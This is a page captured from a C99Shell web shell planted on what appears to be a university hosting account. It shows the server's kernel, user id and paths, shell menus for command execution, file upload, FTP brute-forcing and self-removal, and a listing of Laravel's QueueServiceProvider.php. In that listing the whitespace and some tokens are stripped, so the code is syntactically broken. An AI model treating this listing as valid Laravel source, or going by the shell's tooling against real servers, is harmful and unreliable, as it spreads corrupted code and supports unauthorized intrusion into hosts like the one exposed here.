!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache/2.2.22 (Debian). PHP/5.6.36 

uname -a: Linux h05.hvosting.ua 4.9.110-amd64 #3 SMP Sun Nov 4 16:27:09 UTC 2018 x86_64 

uid=1389(h33678) gid=1099(h33678) groups=1099(h33678),502(mgrsecure) 

Safe-mode: OFF (not secure)

/home/h33678/data/www/it-man.ztu.edu.ua/src/vendor/laravel/framework/src/Illuminate/Queue/   drwxr-xr-x
Free 116.5 GB of 200.55 GB (58.09%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     QueueServiceProvider.php (6.91 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Illuminate\Queue;

use 
IlluminateQueueClosure;
use 
Illuminate\Support\ServiceProvider;
use 
Illuminate\Queue\Console\WorkCommand;
use 
Illuminate\Queue\Console\ListenCommand;
use 
Illuminate\Queue\Console\RestartCommand;
use 
Illuminate\Queue\Connectors\SqsConnector;
use 
Illuminate\Queue\Connectors\NullConnector;
use 
Illuminate\Queue\Connectors\SyncConnector;
use 
Illuminate\Queue\Connectors\RedisConnector;
use 
Illuminate\Queue\Failed\NullFailedJobProvider;
use 
Illuminate\Queue\Connectors\DatabaseConnector;
use 
Illuminate\Queue\Connectors\BeanstalkdConnector;
use 
Illuminate\Queue\Failed\DatabaseFailedJobProvider;

class 
QueueServiceProvider extends ServiceProvider
{
    
/**
     * Indicates if loading of the provider is deferred.
     *
     * @var bool
     */
    
protected $defer true;

    
/**
     * Register the service provider.
     *
     * @return void
     */
    
public function register()
    {
        
$this->registerManager();

        
$this->registerWorker();

        
$this->registerListener();

        
$this->registerFailedJobServices();

        
$this->registerQueueClosure();
    }

    
/**
     * Register the queue manager.
     *
     * @return void
     */
    
protected function registerManager()
    {
        
$this->app->singleton('queue', function ($app) {
            
// Once we have an instance of the queue manager, we will register the various
            // resolvers for the queue connectors. These connectors are responsible for
            // creating the classes that accept queue configs and instantiate queues.
            
$manager = new QueueManager($app);

            
$this->registerConnectors($manager);

            return 
$manager;
        });

        
$this->app->singleton('queue.connection', function ($app) {
            return 
$app['queue']->connection();
        });
    }

    
/**
     * Register the queue worker.
     *
     * @return void
     */
    
protected function registerWorker()
    {
        
$this->registerWorkCommand();

        
$this->registerRestartCommand();

        
$this->app->singleton('queue.worker', function ($app) {
            return new 
Worker($app['queue'], $app['queue.failer'], $app['events']);
        });
    }

    
/**
     * Register the queue worker console command.
     *
     * @return void
     */
    
protected function registerWorkCommand()
    {
        
$this->app->singleton('command.queue.work', function ($app) {
            return new 
WorkCommand($app['queue.worker']);
        });

        
$this->commands('command.queue.work');
    }

    
/**
     * Register the queue listener.
     *
     * @return void
     */
    
protected function registerListener()
    {
        
$this->registerListenCommand();

        
$this->app->singleton('queue.listener', function ($app) {
            return new 
Listener($app->basePath());
        });
    }

    
/**
     * Register the queue listener console command.
     *
     * @return void
     */
    
protected function registerListenCommand()
    {
        
$this->app->singleton('command.queue.listen', function ($app) {
            return new 
ListenCommand($app['queue.listener']);
        });

        
$this->commands('command.queue.listen');
    }

    
/**
     * Register the queue restart console command.
     *
     * @return void
     */
    
public function registerRestartCommand()
    {
        
$this->app->singleton('command.queue.restart', function () {
            return new 
RestartCommand;
        });

        
$this->commands('command.queue.restart');
    }

    
/**
     * Register the connectors on the queue manager.
     *
     * @param  \Illuminate\Queue\QueueManager  $manager
     * @return void
     */
    
public function registerConnectors($manager)
    {
        foreach ([
'Null''Sync''Database''Beanstalkd''Redis''Sqs'] as $connector) {
            
$this->{"register{$connector}Connector"}($manager);
        }
    }

    
/**
     * Register the Null queue connector.
     *
     * @param  \Illuminate\Queue\QueueManager  $manager
     * @return void
     */
    
protected function registerNullConnector($manager)
    {
        
$manager->addConnector('null', function () {
            return new 
NullConnector;
        });
    }

    
/**
     * Register the Sync queue connector.
     *
     * @param  \Illuminate\Queue\QueueManager  $manager
     * @return void
     */
    
protected function registerSyncConnector($manager)
    {
        
$manager->addConnector('sync', function () {
            return new 
SyncConnector;
        });
    }

    
/**
     * Register the Beanstalkd queue connector.
     *
     * @param  \Illuminate\Queue\QueueManager  $manager
     * @return void
     */
    
protected function registerBeanstalkdConnector($manager)
    {
        
$manager->addConnector('beanstalkd', function () {
            return new 
BeanstalkdConnector;
        });
    }

    
/**
     * Register the database queue connector.
     *
     * @param  \Illuminate\Queue\QueueManager  $manager
     * @return void
     */
    
protected function registerDatabaseConnector($manager)
    {
        
$manager->addConnector('database', function () {
            return new 
DatabaseConnector($this->app['db']);
        });
    }

    
/**
     * Register the Redis queue connector.
     *
     * @param  \Illuminate\Queue\QueueManager  $manager
     * @return void
     */
    
protected function registerRedisConnector($manager)
    {
        
$app $this->app;

        
$manager->addConnector('redis', function () use ($app) {
            return new 
RedisConnector($app['redis']);
        });
    }

    
/**
     * Register the Amazon SQS queue connector.
     *
     * @param  \Illuminate\Queue\QueueManager  $manager
     * @return void
     */
    
protected function registerSqsConnector($manager)
    {
        
$manager->addConnector('sqs', function () {
            return new 
SqsConnector;
        });
    }

    
/**
     * Register the failed job services.
     *
     * @return void
     */
    
protected function registerFailedJobServices()
    {
        
$this->app->singleton('queue.failer', function ($app) {
            
$config $app['config']['queue.failed'];

            if (isset(
$config['table'])) {
                return new 
DatabaseFailedJobProvider($app['db'], $config['database'], $config['table']);
            } else {
                return new 
NullFailedJobProvider;
            }
        });
    }

    
/**
     * Register the Illuminate queued closure job.
     *
     * @return void
     */
    
protected function registerQueueClosure()
    {
        
$this->app->singleton('IlluminateQueueClosure', function ($app) {
            return new 
IlluminateQueueClosure($app['encrypter']);
        });
    }

    
/**
     * Get the services provided by the provider.
     *
     * @return array
     */
    
public function provides()
    {
        return [
            
'queue''queue.worker''queue.listener''queue.failer',
            
'command.queue.work''command.queue.listen',
            
'command.queue.restart''queue.connection',
        ];
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by PinoyWH1Z | C99Shell Github | Generation time: 0.0376 ]--